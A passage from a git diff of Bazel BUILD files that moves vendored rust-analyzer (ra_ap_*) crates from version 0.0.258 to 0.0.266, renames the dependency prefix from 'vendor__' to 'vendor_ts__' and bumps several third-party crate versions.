"@vendor__scoped-tls-1.0.1//:scoped_tls", - "@vendor__smallvec-1.13.2//:smallvec", - "@vendor__tracing-0.1.41//:tracing", - "@vendor__triomphe-0.1.14//:triomphe", - "@vendor__typed-arena-2.0.2//:typed_arena", + "@vendor_ts__arrayvec-0.7.6//:arrayvec", + "@vendor_ts__bitflags-2.8.0//:bitflags", + "@vendor_ts__chalk-ir-0.99.0//:chalk_ir", + "@vendor_ts__chalk-recursive-0.99.0//:chalk_recursive", + "@vendor_ts__chalk-solve-0.99.0//:chalk_solve", + "@vendor_ts__cov-mark-2.0.0//:cov_mark", + "@vendor_ts__either-1.14.0//:either", + "@vendor_ts__ena-0.14.3//:ena", + "@vendor_ts__indexmap-2.7.0//:indexmap", + "@vendor_ts__itertools-0.12.1//:itertools", + "@vendor_ts__la-arena-0.3.1//:la_arena", + "@vendor_ts__nohash-hasher-0.2.0//:nohash_hasher", + "@vendor_ts__oorandom-11.1.4//:oorandom", + "@vendor_ts__ra-ap-rustc_abi-0.97.0//:ra_ap_rustc_abi", + "@vendor_ts__ra-ap-rustc_hashes-0.97.0//:ra_ap_rustc_hashes", + "@vendor_ts__ra-ap-rustc_index-0.97.0//:ra_ap_rustc_index", + "@vendor_ts__ra-ap-rustc_pattern_analysis-0.97.0//:ra_ap_rustc_pattern_analysis", + "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db", + "@vendor_ts__ra_ap_hir_def-0.0.266//:ra_ap_hir_def", + "@vendor_ts__ra_ap_hir_expand-0.0.266//:ra_ap_hir_expand", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__rustc_apfloat-0.2.1-llvm-462a31f5a5ab//:rustc_apfloat", + "@vendor_ts__scoped-tls-1.0.1//:scoped_tls", + "@vendor_ts__smallvec-1.14.0//:smallvec", + "@vendor_ts__tracing-0.1.41//:tracing", + "@vendor_ts__triomphe-0.1.14//:triomphe", + "@vendor_ts__typed-arena-2.0.2//:typed_arena", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_ide_db-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_ide_db-0.0.266.bazel similarity index 68% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_ide_db-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_ide_db-0.0.266.bazel index c81b3c20fac0..3b6ecbc023c6 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_ide_db-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_ide_db-0.0.266.bazel @@ -17,14 +17,13 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db": "base_db", - "@vendor__ra_ap_hir-0.0.258//:ra_ap_hir": "hir", - "@vendor__ra_ap_limit-0.0.258//:ra_ap_limit": "limit", - "@vendor__ra_ap_parser-0.0.258//:ra_ap_parser": "parser", - "@vendor__ra_ap_profile-0.0.258//:ra_ap_profile": "profile", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span": "span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax": "syntax", + "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db": "base_db", + "@vendor_ts__ra_ap_hir-0.0.266//:ra_ap_hir": "hir", + "@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser": "parser", + "@vendor_ts__ra_ap_profile-0.0.266//:ra_ap_profile": "profile", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span": "span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax": "syntax", }, compile_data = glob( include = ["**"], @@ -89,30 +88,29 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__arrayvec-0.7.6//:arrayvec", - "@vendor__bitflags-2.7.0//:bitflags", - "@vendor__cov-mark-2.0.0//:cov_mark", - "@vendor__crossbeam-channel-0.5.14//:crossbeam_channel", - "@vendor__either-1.13.0//:either", - "@vendor__fst-0.4.7//:fst", - "@vendor__indexmap-2.7.0//:indexmap", - "@vendor__itertools-0.12.1//:itertools", - "@vendor__line-index-0.1.2//:line_index", - "@vendor__memchr-2.7.4//:memchr", - "@vendor__nohash-hasher-0.2.0//:nohash_hasher", - "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db", - "@vendor__ra_ap_hir-0.0.258//:ra_ap_hir", - "@vendor__ra_ap_limit-0.0.258//:ra_ap_limit", - "@vendor__ra_ap_parser-0.0.258//:ra_ap_parser", - "@vendor__ra_ap_profile-0.0.258//:ra_ap_profile", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax", - "@vendor__rayon-1.10.0//:rayon", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__tracing-0.1.41//:tracing", - "@vendor__triomphe-0.1.14//:triomphe", + "@vendor_ts__arrayvec-0.7.6//:arrayvec", + "@vendor_ts__bitflags-2.8.0//:bitflags", + "@vendor_ts__cov-mark-2.0.0//:cov_mark", + "@vendor_ts__crossbeam-channel-0.5.14//:crossbeam_channel", + "@vendor_ts__either-1.14.0//:either", + "@vendor_ts__fst-0.4.7//:fst", + "@vendor_ts__indexmap-2.7.0//:indexmap", + "@vendor_ts__itertools-0.12.1//:itertools", + "@vendor_ts__line-index-0.1.2//:line_index", + "@vendor_ts__memchr-2.7.4//:memchr", + "@vendor_ts__nohash-hasher-0.2.0//:nohash_hasher", + "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db", + "@vendor_ts__ra_ap_hir-0.0.266//:ra_ap_hir", + "@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser", + "@vendor_ts__ra_ap_profile-0.0.266//:ra_ap_profile", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax", + "@vendor_ts__rayon-1.10.0//:rayon", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__tracing-0.1.41//:tracing", + "@vendor_ts__triomphe-0.1.14//:triomphe", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_intern-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_intern-0.0.266.bazel similarity index 93% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_intern-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_intern-0.0.266.bazel index ad2a8bb0bc99..a36d7b0d3cb5 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_intern-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_intern-0.0.266.bazel @@ -79,12 +79,11 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__dashmap-5.5.3//:dashmap", - "@vendor__hashbrown-0.14.5//:hashbrown", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__sptr-0.3.2//:sptr", - "@vendor__triomphe-0.1.14//:triomphe", + "@vendor_ts__dashmap-5.5.3//:dashmap", + "@vendor_ts__hashbrown-0.14.5//:hashbrown", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__triomphe-0.1.14//:triomphe", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_load-cargo-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_load-cargo-0.0.266.bazel similarity index 69% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_load-cargo-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_load-cargo-0.0.266.bazel index 90360799291d..09abc14852e5 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_load-cargo-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_load-cargo-0.0.266.bazel @@ -17,16 +17,16 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_hir_expand-0.0.258//:ra_ap_hir_expand": "hir_expand", - "@vendor__ra_ap_ide_db-0.0.258//:ra_ap_ide_db": "ide_db", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern": "intern", - "@vendor__ra_ap_paths-0.0.258//:ra_ap_paths": "paths", - "@vendor__ra_ap_proc_macro_api-0.0.258//:ra_ap_proc_macro_api": "proc_macro_api", - "@vendor__ra_ap_project_model-0.0.258//:ra_ap_project_model": "project_model", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span": "span", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt": "tt", - "@vendor__ra_ap_vfs-0.0.258//:ra_ap_vfs": "vfs", - "@vendor__ra_ap_vfs-notify-0.0.258//:ra_ap_vfs_notify": "vfs_notify", + "@vendor_ts__ra_ap_hir_expand-0.0.266//:ra_ap_hir_expand": "hir_expand", + "@vendor_ts__ra_ap_ide_db-0.0.266//:ra_ap_ide_db": "ide_db", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern": "intern", + "@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths": "paths", + "@vendor_ts__ra_ap_proc_macro_api-0.0.266//:ra_ap_proc_macro_api": "proc_macro_api", + "@vendor_ts__ra_ap_project_model-0.0.266//:ra_ap_project_model": "project_model", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span": "span", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt": "tt", + "@vendor_ts__ra_ap_vfs-0.0.266//:ra_ap_vfs": "vfs", + "@vendor_ts__ra_ap_vfs-notify-0.0.266//:ra_ap_vfs_notify": "vfs_notify", }, compile_data = glob( include = ["**"], @@ -91,21 +91,21 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__anyhow-1.0.95//:anyhow", - "@vendor__crossbeam-channel-0.5.14//:crossbeam_channel", - "@vendor__itertools-0.12.1//:itertools", - "@vendor__ra_ap_hir_expand-0.0.258//:ra_ap_hir_expand", - "@vendor__ra_ap_ide_db-0.0.258//:ra_ap_ide_db", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", - "@vendor__ra_ap_paths-0.0.258//:ra_ap_paths", - "@vendor__ra_ap_proc_macro_api-0.0.258//:ra_ap_proc_macro_api", - "@vendor__ra_ap_project_model-0.0.258//:ra_ap_project_model", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt", - "@vendor__ra_ap_vfs-0.0.258//:ra_ap_vfs", - "@vendor__ra_ap_vfs-notify-0.0.258//:ra_ap_vfs_notify", - "@vendor__tracing-0.1.41//:tracing", + "@vendor_ts__anyhow-1.0.96//:anyhow", + "@vendor_ts__crossbeam-channel-0.5.14//:crossbeam_channel", + "@vendor_ts__itertools-0.12.1//:itertools", + "@vendor_ts__ra_ap_hir_expand-0.0.266//:ra_ap_hir_expand", + "@vendor_ts__ra_ap_ide_db-0.0.266//:ra_ap_ide_db", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", + "@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths", + "@vendor_ts__ra_ap_proc_macro_api-0.0.266//:ra_ap_proc_macro_api", + "@vendor_ts__ra_ap_project_model-0.0.266//:ra_ap_project_model", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt", + "@vendor_ts__ra_ap_vfs-0.0.266//:ra_ap_vfs", + "@vendor_ts__ra_ap_vfs-notify-0.0.266//:ra_ap_vfs_notify", + "@vendor_ts__tracing-0.1.41//:tracing", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_mbe-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_mbe-0.0.266.bazel similarity index 74% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_mbe-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_mbe-0.0.266.bazel index f2161a2ee382..c3a16c603ff2 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_mbe-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_mbe-0.0.266.bazel @@ -17,13 +17,13 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern": "intern", - "@vendor__ra_ap_parser-0.0.258//:ra_ap_parser": "parser", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span": "span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax": "syntax", - "@vendor__ra_ap_syntax-bridge-0.0.258//:ra_ap_syntax_bridge": "syntax_bridge", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt": "tt", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern": "intern", + "@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser": "parser", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span": "span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax": "syntax", + "@vendor_ts__ra_ap_syntax-bridge-0.0.266//:ra_ap_syntax_bridge": "syntax_bridge", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt": "tt", }, compile_data = glob( include = ["**"], @@ -88,20 +88,20 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__arrayvec-0.7.6//:arrayvec", - "@vendor__cov-mark-2.0.0//:cov_mark", - "@vendor__ra-ap-rustc_lexer-0.87.0//:ra_ap_rustc_lexer", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", - "@vendor__ra_ap_parser-0.0.258//:ra_ap_parser", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax", - "@vendor__ra_ap_syntax-bridge-0.0.258//:ra_ap_syntax_bridge", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__smallvec-1.13.2//:smallvec", - "@vendor__tracing-0.1.41//:tracing", + "@vendor_ts__arrayvec-0.7.6//:arrayvec", + "@vendor_ts__cov-mark-2.0.0//:cov_mark", + "@vendor_ts__ra-ap-rustc_lexer-0.97.0//:ra_ap_rustc_lexer", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", + "@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax", + "@vendor_ts__ra_ap_syntax-bridge-0.0.266//:ra_ap_syntax_bridge", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__smallvec-1.14.0//:smallvec", + "@vendor_ts__tracing-0.1.41//:tracing", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_parser-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_parser-0.0.266.bazel similarity index 89% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_parser-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_parser-0.0.266.bazel index 7b9d090ca90b..e183b2734b9e 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_parser-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_parser-0.0.266.bazel @@ -17,8 +17,7 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_edition-0.0.258//:ra_ap_edition": "edition", - "@vendor__ra_ap_limit-0.0.258//:ra_ap_limit": "limit", + "@vendor_ts__ra_ap_edition-0.0.266//:ra_ap_edition": "edition", }, compile_data = glob( include = ["**"], @@ -87,12 +86,11 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__drop_bomb-0.1.5//:drop_bomb", - "@vendor__ra-ap-rustc_lexer-0.87.0//:ra_ap_rustc_lexer", - "@vendor__ra_ap_edition-0.0.258//:ra_ap_edition", - "@vendor__ra_ap_limit-0.0.258//:ra_ap_limit", - "@vendor__tracing-0.1.41//:tracing", + "@vendor_ts__drop_bomb-0.1.5//:drop_bomb", + "@vendor_ts__ra-ap-rustc_lexer-0.97.0//:ra_ap_rustc_lexer", + "@vendor_ts__ra_ap_edition-0.0.266//:ra_ap_edition", + "@vendor_ts__tracing-0.1.41//:tracing", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_paths-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_paths-0.0.266.bazel similarity index 98% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_paths-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_paths-0.0.266.bazel index ad60384aca90..71c23f70a942 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_paths-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_paths-0.0.266.bazel @@ -82,8 +82,8 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__camino-1.1.9//:camino", + "@vendor_ts__camino-1.1.9//:camino", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_proc_macro_api-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_proc_macro_api-0.0.266.bazel similarity index 79% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_proc_macro_api-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_proc_macro_api-0.0.266.bazel index 8d97fd5cdd80..52cd154b6fcc 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_proc_macro_api-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_proc_macro_api-0.0.266.bazel @@ -17,11 +17,11 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern": "intern", - "@vendor__ra_ap_paths-0.0.258//:ra_ap_paths": "paths", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span": "span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt": "tt", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern": "intern", + "@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths": "paths", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span": "span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt": "tt", }, compile_data = glob( include = ["**"], @@ -38,7 +38,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2021", proc_macro_deps = [ - "@vendor__serde_derive-1.0.217//:serde_derive", + "@vendor_ts__serde_derive-1.0.218//:serde_derive", ], rustc_flags = [ "--cap-lints=allow", @@ -89,17 +89,17 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__indexmap-2.7.0//:indexmap", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", - "@vendor__ra_ap_paths-0.0.258//:ra_ap_paths", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__serde-1.0.217//:serde", - "@vendor__serde_json-1.0.135//:serde_json", - "@vendor__tracing-0.1.41//:tracing", + "@vendor_ts__indexmap-2.7.0//:indexmap", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", + "@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__serde-1.0.218//:serde", + "@vendor_ts__serde_json-1.0.139//:serde_json", + "@vendor_ts__tracing-0.1.41//:tracing", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_profile-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_profile-0.0.266.bazel similarity index 80% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_profile-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_profile-0.0.266.bazel index 755a0f6b3834..1ca7ddd38df7 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_profile-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_profile-0.0.266.bazel @@ -79,46 +79,46 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__cfg-if-1.0.0//:cfg_if", - "@vendor__libc-0.2.169//:libc", + "@vendor_ts__cfg-if-1.0.0//:cfg_if", + "@vendor_ts__libc-0.2.169//:libc", ] + select({ "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows-sys-0.52.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [ - "@vendor__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") + "@vendor_ts__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") ], "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [ - "@vendor__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") + "@vendor_ts__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") ], "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [ - "@vendor__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") + "@vendor_ts__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") ], "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [ - "@vendor__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") + "@vendor_ts__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows-sys-0.52.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ - "@vendor__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") + "@vendor_ts__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") ], "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [ - "@vendor__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") + "@vendor_ts__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") ], "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [ - "@vendor__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") + "@vendor_ts__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows-sys-0.52.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ - "@vendor__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") + "@vendor_ts__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") ], "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ - "@vendor__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") + "@vendor_ts__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_project_model-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_project_model-0.0.266.bazel similarity index 71% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_project_model-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_project_model-0.0.266.bazel index 7ebaa0815432..7edf5bc0f821 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_project_model-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_project_model-0.0.266.bazel @@ -17,13 +17,13 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db": "base_db", - "@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg": "cfg", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern": "intern", - "@vendor__ra_ap_paths-0.0.258//:ra_ap_paths": "paths", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span": "span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", - "@vendor__ra_ap_toolchain-0.0.258//:ra_ap_toolchain": "toolchain", + "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db": "base_db", + "@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg": "cfg", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern": "intern", + "@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths": "paths", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span": "span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_toolchain-0.0.266//:ra_ap_toolchain": "toolchain", }, compile_data = glob( include = ["**"], @@ -40,7 +40,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2021", proc_macro_deps = [ - "@vendor__serde_derive-1.0.217//:serde_derive", + "@vendor_ts__serde_derive-1.0.218//:serde_derive", ], rustc_flags = [ "--cap-lints=allow", @@ -91,24 +91,24 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__anyhow-1.0.95//:anyhow", - "@vendor__cargo_metadata-0.18.1//:cargo_metadata", - "@vendor__itertools-0.12.1//:itertools", - "@vendor__la-arena-0.3.1//:la_arena", - "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db", - "@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", - "@vendor__ra_ap_paths-0.0.258//:ra_ap_paths", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__ra_ap_toolchain-0.0.258//:ra_ap_toolchain", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__semver-1.0.24//:semver", - "@vendor__serde-1.0.217//:serde", - "@vendor__serde_json-1.0.135//:serde_json", - 